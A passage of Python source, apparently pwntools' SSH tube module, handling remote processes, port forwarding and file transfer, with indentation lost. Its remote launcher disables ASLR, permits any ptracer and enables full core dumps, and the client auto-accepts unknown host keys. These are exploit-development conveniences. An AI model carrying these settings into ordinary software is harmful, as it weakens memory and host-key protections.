# Cannot just check "executable in lib", see issue #1047
if lib.endswith(self.executable):
return pwnlib.elf.elf.ELF(lib)
@property
def corefile(self):
import pwnlib.elf.corefile
finder = pwnlib.elf.corefile.CorefileFinder(self)
if not finder.core_path:
self.error("Could not find core file for pid %i" % self.pid)
return pwnlib.elf.corefile.Corefile(finder.core_path)
def getenv(self, variable, **kwargs):
r"""Retrieve the address of an environment variable in the remote process.
Examples:
>>> s = ssh(host='example.pwnme')
>>> p = s.process(['python', '-c', 'print("Hello")'])
>>> hex(p.getenv('PATH')) # doctest: +ELLIPSIS
'0x...'
>>> p.recvall()
b'Hello\n'
"""
argv0 = self.argv[0]
variable = context._encode(variable)
script = ';'.join(('from ctypes import *',
'import os',
'libc = CDLL("libc.so.6")',
'getenv = libc.getenv',
'getenv.restype = c_void_p',
'print(os.path.realpath(%r))' % self.executable,
'print(getenv(%r))' % variable,))
try:
with context.local(log_level='error'):
python = self.parent.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.parent.process([argv0,'-c', script.strip()],
executable=python,
env=self.env,
**kwargs)
path = io.recvline()
address = int(io.recvall())
address -= len(python)
address += len(path)
return int(address) & context.mask
except Exception:
self.exception("Could not look up environment variable %r" % variable)
def _close_msg(self):
# If we never completely started up, just use the parent implementation
if self.executable is None:
return super(ssh_process, self)._close_msg()
self.info('Stopped remote process %r on %s (pid %i)' \
% (os.path.basename(self.executable),
self.host,
self.pid))
class ssh_connecter(sock):
def __init__(self, parent, host, port, *a, **kw):
super(ssh_connecter, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
self.rhost = host
self.rport = port
msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
with self.waitfor(msg) as h:
try:
self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
except Exception as e:
self.exception(e.message)
raise
try:
# Iterate all layers of proxying to get to base-level Socket object
curr = self.sock.get_transport().sock
while getattr(curr, "get_transport", None):
curr = curr.get_transport().sock
sockname = curr.getsockname()
self.lhost = sockname[0]
self.lport = sockname[1]
except Exception as e:
self.exception("Could not find base-level Socket object.")
raise e
h.success()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
def __init__(self, parent, bind_address, port, *a, **kw):
super(ssh_listener, self).__init__(*a, **kw)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.host = parent.host
try:
self.port = parent.transport.request_port_forward(bind_address, port)
except Exception:
h.failure('Failed create a port forwarding')
raise
def accepter():
msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
h = self.waitfor(msg)
try:
self.sock = parent.transport.accept()
parent.transport.cancel_port_forward(bind_address, self.port)
except Exception:
self.sock = None
h.failure()
self.exception('Failed to get a connection')
return
self.rhost, self.rport = self.sock.origin_addr
h.success('Got connection from %s:%d' % (self.rhost, self.rport))
self._accepter = context.Thread(target = accepter)
self._accepter.daemon = True
self._accepter.start()
def _close_msg(self):
self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def wait_for_connection(self):
"""Blocks until a connection has been established."""
_ = self.sock
return self
def __getattr__(self, key):
if key == 'sock':
while self._accepter.is_alive():
self._accepter.join(timeout = 0.1)
return self.sock
else:
return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used.
Example proxying:
.. doctest::
:skipif: github_actions
>>> s1 = ssh(host='example.pwnme')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme',
... proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not user and 'user' in host_config:
self.user = user = host_config['user']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = bool(proxy_sock or proxy_command)
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ... name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (six.text_type, bytes, bytearray)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if not all(isinstance(arg, (six.text_type, bytes, bytearray)) for arg in argv):
self.error("argv must be strings or bytes: %r" % argv)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Create a duplicate so we can modify it
argv = list(argv or [])
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, oarg in enumerate(argv):
if isinstance(oarg, six.text_type):
arg = oarg.encode('utf-8')
else:
arg = oarg
if b'\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, oarg))
argv[i] = bytearray(arg.rstrip(b'\x00'))
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
# Converts the environment variables to a list of tuples to retain order.
env2 = []
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if isinstance(k, six.text_type):
k = k.encode('utf-8')
if isinstance(v, six.text_type):
v = v.encode('utf-8')
if b'\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if b'\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env2.append((bytearray(k.rstrip(b'\x00')), bytearray(v.rstrip(b'\x00'))))
env = env2 or env
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
self.error("executable / argv[0] must be a string: %r" % executable)
executable = context._decode(executable)
# Allow passing in sys.stdin/stdout/stderr objects
handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
stdin = handles.get(stdin, stdin)
stdout = handles.get(stdout, stdout)
stderr = handles.get(stderr, stderr)
# Allow the user to provide a self-contained function to run
def func(): pass
func = preexec_fn or func
func_args = preexec_args
if not isinstance(func, types.FunctionType):
self.error("preexec_fn must be a function")
func_name = func.__name__
if func_name == (lambda: 0).__name__:
self.error("preexec_fn cannot be a lambda")
func_src = inspect.getsource(func).strip()
setuid = True if setuid is None else bool(setuid)
script = r"""
#!/usr/bin/env python
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
try:
integer_types = int, long
except NameError:
integer_types = int,
exe = %(executable)r
argv = [bytes(a) for a in %(argv)r]
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
env = OrderedDict((bytes(k), bytes(v)) for k,v in env)
os.environ.clear()
getattr(os, 'environb', os.environ).update(env)
else:
env = os.environ
def is_exe(path):
return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
for path in PATH:
test_path = os.path.join(path, exe)
if is_exe(test_path):
exe = test_path
break
if not is_exe(exe):
sys.stderr.write('3\n')
sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
sys.exit(-1)
if not %(setuid)r:
PR_SET_NO_NEW_PRIVS = 38
result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
if result != 0:
sys.stdout.write('3\n')
sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
sys.exit(-1)
try:
PR_SET_PTRACER = 0x59616d61
PR_SET_PTRACER_ANY = -1
ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
if (st.st_mode & stat.S_ISUID):
suid = st.st_uid
if (st.st_mode & stat.S_ISGID):
sgid = st.st_gid
if sys.argv[-1] == 'check':
sys.stdout.write("1\n")
sys.stdout.write(str(os.getpid()) + "\n")
sys.stdout.write(str(os.getuid()) + "\n")
sys.stdout.write(str(os.getgid()) + "\n")
sys.stdout.write(str(suid) + "\n")
sys.stdout.write(str(sgid) + "\n")
sys.stdout.write(os.path.realpath(exe) + '\x00')
sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
if newfd is None:
os.close(fd)
elif isinstance(newfd, (str, bytes)):
newfd = os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
os.dup2(newfd, fd)
os.close(newfd)
elif isinstance(newfd, integer_types) and newfd != fd:
os.dup2(fd, newfd)
if not %(aslr)r:
if platform.system().lower() == 'linux' and %(setuid)r is not True:
ADDR_NO_RANDOMIZE = 0x0040000
ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
with open('/proc/self/coredump_filter', 'w') as core_filter:
core_filter.write('0x3f\n')
except Exception:
pass
# Assume that the user would prefer to have core dumps.
try:
resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
pass
%(func_src)s
%(func_name)s(*%(func_args)r)
os.execve(exe, argv, env)
""" % locals()
script = script.strip()
self.debug("Created execve script:\n" + script)
if not run:
with context.local(log_level='error'):
tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
self.chmod('+x', tmpfile)
self.info("Uploading execve script to %r" % tmpfile)
self.upload_data(script, tmpfile)
return tmpfile
if self.isEnabledFor(logging.DEBUG):
execve_repr = "execve(%r, %s, %s)" % (executable,
argv,
'os.environ'
if (env in (None, os.environ))
else env)
# Avoid spamming the screen
if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
execve_repr = execve_repr[:512] + '...'
else:
execve_repr = repr(executable)
msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
if timeout == Timeout.default:
timeout = self.timeout
with self.progress(msg) as h:
script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
with context.quiet:
python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=timeout)
try:
result = safeeval.const(python.recvline())
except (EOFError, ValueError):
h.failure("Process creation failed")
self.warn_once('Could not find a Python interpreter on %s\n' % self.host \
+ "Use ssh.run() instead of ssh.process()")
return None
# If an error occurred, try to grab as much output
# as we can.
if result != 1:
error_message = python.recvrepeat(timeout=1)
if result == 0:
self.error("%r does not exist or is not executable" % executable)
elif result == 3:
self.error(error_message)
elif result == 2:
self.error("python is not installed on the remote system %r" % self.host)
elif result != 1:
h.failure("something bad happened:\n%s" % error_message)
python.pid = safeeval.const(python.recvline())
python.uid = safeeval.const(python.recvline())
python.gid = safeeval.const(python.recvline())
python.suid = safeeval.const(python.recvline())
python.sgid = safeeval.const(python.recvline())
python.argv = argv
python.executable = context._decode(python.recvuntil(b'\x00')[:-1])
h.success('pid %i' % python.pid)
if not aslr and setuid and (python.uid != python.suid or python.gid != python.sgid):
effect = "partial" if self.aslr_ulimit else "no"
message = "Specfied aslr=False on setuid binary %s\n" % python.executable
message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
if self.aslr_ulimit:
message += "Unlimited stack size should de-randomize shared libraries."
self.warn_once(message)
elif not aslr:
self.warn_once("ASLR is disabled for %r!" % python.executable)
return python
def which(self, program):
"""which(program) -> str
Minor modification to just directly invoking ``which`` on the remote
system which adds the current working directory to the end of ``$PATH``.
"""
# If name is a path, do not attempt to resolve it.
if os.path.sep in program:
return program
result = self.run('export PATH=$PATH:$PWD; which %s' % program).recvall().strip().decode()
if ('/%s' % program) not in result:
return None
return result
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
Open a new channel with a specific process inside. If `tty` is True,
then a TTY is requested on the remote server.
If `raw` is True, terminal control codes are ignored and input is not
echoed back.
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> py = s.run('python -i')
>>> _ = py.recvuntil(b'>>> ')
>>> py.sendline(b'print(2+2)')
>>> py.sendline(b'exit')
>>> print(repr(py.recvline()))
b'4\n'
>>> s.system('env | grep -a AAAA', env={'AAAA': b'\x90'}).recvall()
b'AAAA=\x90\n'
"""
if wd is None:
wd = self.cwd
if timeout is None:
timeout = self.timeout
return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
"""Retrieve the address of an environment variable on the remote
system.
Note:
The exact address will differ based on what other environment
variables are set, as well as argv[0]. In order to ensure that
the path is *exactly* the same, it is recommended to invoke the
process with ``argv=[]``.
"""
script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
with context.local(log_level='error'):
python = self.which('python')
if not python:
self.error("Python is not installed on the remote system.")
io = self.process(['','-c', script.strip()], executable=python, **kwargs)
result = io.recvall()
try:
return int(result) & context.mask
except ValueError:
self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
Run a command on the remote server and return a tuple with
(data, exit_status). If `tty` is True, then the command is run inside
a TTY on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(s.run_to_end('echo Hello; exit 17'))
(b'Hello\n', 17)
"""
with context.local(log_level = 'ERROR'):
c = self.run(process, tty, wd = wd, timeout = Timeout.default)
data = c.recvall()
retcode = c.wait()
c.close()
return data, retcode
def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme')
>>> a = s.connect_remote(s.host, l.lport)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(context._decode(data))
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace(b'(stdin)= ',b'')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace(b'-',b'').strip()
if not isinstance(data, str):
data = data.decode('ascii')
return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.error("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = b''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'wb') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
if not hasattr(remote, 'encode'):
remote = remote.decode('utf-8')
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.error('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with open('/tmp/bar','w+') as f:
... _ = f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... cache=False)
>>> s.download_data('/tmp/bar')
b'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
b'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p), 'rb') as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(remote),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme')
>>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
>>> print(open('/tmp/upload_foo').read())
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
>>> print(open('/tmp/upload_bar').read())
Hello, world
"""
data = context._encode(data)
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote is None:
